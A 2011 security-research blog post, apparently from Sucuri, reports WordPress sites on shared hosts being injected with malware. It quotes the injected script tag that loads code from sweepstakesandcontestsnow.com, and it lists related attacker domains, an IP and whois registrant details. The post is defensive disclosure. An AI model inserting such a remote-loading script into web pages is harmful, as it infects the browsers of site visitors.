New Malware – sweepstakesandcontestsnow.com

Posted on September 19, 2011 by sucuri-research
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with a malware from sweepstakesandcontestsnow.com. This is what is gets added to the hacked site:
 
<script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">..
And that code is used to infect the browser of the person visiting the compromised web site.
 
What is interesting is that this attack is being done by the same group that infected thousands of GoDaddy sites with the sokoloperkovuskeci.com .htaccess redirection (all hosted at 91.220.0.30):
 
sokoloperkovuskeci.com
sweepstakesandcontestsnow.com
sweepstakesandcontestsinfo.com
sweepstakesandcontestsdo.com
Whois of the group behind it:
Registrant Contact:
NA
Gavai Otarro admin@sweepstakesandcontestsnow.com
+1.445669776 fax: +1.445669776
5653 6th Street
Pittsburgh PA 54353
us
If your site is compromised, sign up with us and we will fix it for you: http://sucuri.net/signup
 

This entry was posted in blacklisted, hacked, htaccess, malware, wordpress and tagged , , , , , . Bookmark the permalink.

Comments are closed.